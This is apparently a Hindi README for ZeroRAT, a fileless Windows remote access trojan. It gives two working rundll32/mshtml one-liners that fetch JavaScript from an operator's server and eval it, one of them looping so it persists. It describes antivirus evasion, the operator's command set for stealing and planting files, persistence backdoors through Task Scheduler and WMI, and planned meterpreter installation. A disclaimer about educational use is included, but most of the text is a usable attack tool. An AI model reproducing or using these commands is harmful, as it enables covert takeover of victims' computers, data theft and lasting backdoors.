
ZeroRAT विंडोज़ पर एक वन-लाइन रिमोट कंट्रोल है।
#ZeroRAT ##परिचय विंडोज़ के लिए रिमोट कंट्रोल (RAT)। क्लाइंट को केवल एक कमांड निष्पादित करनी होती है, जो विंडोज़ के मूल प्रोग्राम का उपयोग करके चलती है, डिस्क पर कोई फ़ाइल नहीं लिखी जाती, और इसमें स्वाभाविक रूप से एंटी-वायरस से बचने (FUD) की विशेषता होती है। रीबूट के बाद निष्क्रिय हो जाता है।
प्रोग्राम में download और upload दोनों क्लाइंट के दृष्टिकोण से हैं। क्लाइंट द्वारा सर्वर से फ़ाइल डाउनलोड करना download कहलाता है, क्लाइंट द्वारा सर्वर पर फ़ाइल अपलोड करना upload कहलाता है।
##कॉन्फ़िगरेशन config.py में क्लाइंट के कनेक्ट होने का पता और बैकएंड का प्रबंधन पासवर्ड बदलें, debug को बंद करना जाँचना न भूलें।
प्रोग्राम flask और sqlite3 पर निर्भर करता है, स्वयं pip से इंस्टॉल करें
##क्लाइंट
<ip>:<port> को वास्तविक कनेक्ट होने वाले पते से बदलें
सामान्य संस्करण
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
अमर संस्करण
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##सर्वर
बैकएंड: http://<ip>:<port>/server/
सर्वर निम्नलिखित कमांड्स का समर्थन करता है:
sessions सक्रिय क्लाइंट्स की सूची दिखाएँuse <id> id के आधार पर क्लाइंट चुनेंset <key> <value> ग्लोबल वेरिएबल सेट करेंshow globals/downloads/uploads ग्लोबल वेरिएबल्स, क्लाइंट द्वारा डाउनलोड की जा सकने वाली फ़ाइलें, क्लाइंट द्वारा अपलोड की गई फ़ाइलें देखेंdelete session वर्तमान क्लाइंट हटाएँdelete download/upload <id> id के अनुसार फ़ाइल हटाएँupfile फ़ाइल को सर्वर पर अपलोड करें और downloads सूची में जोड़ेंdownload download_file और download_save_path दोनों वेरिएबल सेट करें, फिर क्लाइंट फ़ाइल डाउनलोड करके download_save_path में सहेज सकता हैupload upload_file वेरिएबल सेट करें, फिर क्लाइंट upload_file की फ़ाइल को सर्वर पर अपलोड कर सकता हैbackdoor tasks <time> विंडोज़ टास्क शेड्यूलर का उपयोग करके बैकडोर छोड़ें, समय प्रारूप 00:00 हैbackdoor wmi WMI का उपयोग करके बैकडोर छोड़ें, हर एक घंटे में निष्पादित होता हैउपरोक्त कमांड्स के अलावा, बाकी सभी को विंडोज़ सिस्टम कमांड के रूप में निष्पादित किया जाएगा
कमांड विवरण के लिए /static/js/xkcd_cli.js देखें
##विकास क्लाइंट के लिए बैकएंड कमांड /static/js/xkcd_cli.js में हैं
सर्वर के लिए बैकएंड कमांड /controllers/server.py में हैं
क्लाइंट लॉजिक /controllers/client.py में है
क्लाइंट payload निर्माण payload.py में है
डेटाबेस ऑपरेशन /models/ में हैं
##संपर्क http://5alt.me
md5_salt [AT] qq.com
##संदर्भ https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##अस्वीकरण इस टूल का उपयोग करते समय कृपया स्थानीय कानूनों का पालन करें, इसका उपयोग केवल शैक्षणिक परीक्षण के लिए किया जा सकता है, दूसरों के कंप्यूटर को अवैध रूप से नियंत्रित करना सख्त वर्जित है। यदि कोई क्षति होती है, तो इसका लेखक से कोई संबंध नहीं है।
##License GPLV3
##TODO
meterpreter shellcode InstallUtil द्वारा shellcode निष्पादित करने की विधि से meterpreter स्थापित करें, पहले LHOST और LPORT सेट करना आवश्यक है (migrate के बाद ही कमांड स्वीकार करना जारी रख सकता है, .NET Framework 2.0 पर निर्भर)meterpreter powershell Powershell विधि से meterpreter स्थापित करें (powershell 1.0 पर निर्भर)